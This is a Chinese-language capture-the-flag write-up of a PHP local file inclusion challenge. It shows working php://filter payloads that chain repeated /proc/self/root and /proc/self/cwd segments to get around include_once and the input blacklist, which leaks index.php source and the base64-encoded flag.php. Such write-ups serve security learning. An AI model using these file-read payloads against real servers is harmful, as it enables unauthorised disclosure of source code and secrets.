第三周3

题目： [NSSRound#8 Basic]MyPage

1. 打开环境发现空白 什么也没有
   但我们可以看到有个file参数

2. 我们用伪协议试一下
   file=php://filter/convert.base64-encode/resource=index.php
   发现啥也没有

3. 这个时候我们没有办法 可能是有include_once函数
   可能已经包含了应该文件 这个函数只能包含一个文件

4. 这个时候我们就想到了一种厉害的方法
   /proc/self指向当前进程的/proc/pid/，/proc/self/root/是指向/的符号链接
   cwd 文件是一个指向当前进程运行目录的符号链接
   /proc/self/cwd 返回当前文件所在目录

5. 构造payload：file=php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/index.php
   看到了php代码 如下：

    <?php
   error_reporting(0);
   
   include 'flag.php';
   
   if(!isset($_GET['file'])) {
       header('Location:/index.php?file=');
   } else {
       $file = $_GET['file'];
   
       if (!preg_match('/\.\.|data|input|glob|global|var|dict|gopher|file|http|phar|localhost|\?|\*|\~|zip|7z|compress/is', $file)) {
           include_once $file;
       } else {
           die('error.');
       }
   }

6. 简单审计一下 就是因为这个include_once 我们直接把index换为flag
   file=php://filter/read=convert.base64-encode/resource=/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/cwd/flag.php

7. 得到PD9waHAKJGZsYWc9J05TU0NURntlYjJiMmUxZi05NGY2LTQyNGItYmZmMy1jYzE1MzIzZmJjMWV9JzsK
   解密后： 得到flag

8. 总结：
   就是绕过这个 include_once()函数
   用/proc/self指向当前进程的/proc/pid/，/proc/self/root/是指向/的符号链接
   cwd 文件是一个指向当前进程运行目录的符号链接
   /proc/self/cwd 返回当前文件所在目录
   绕过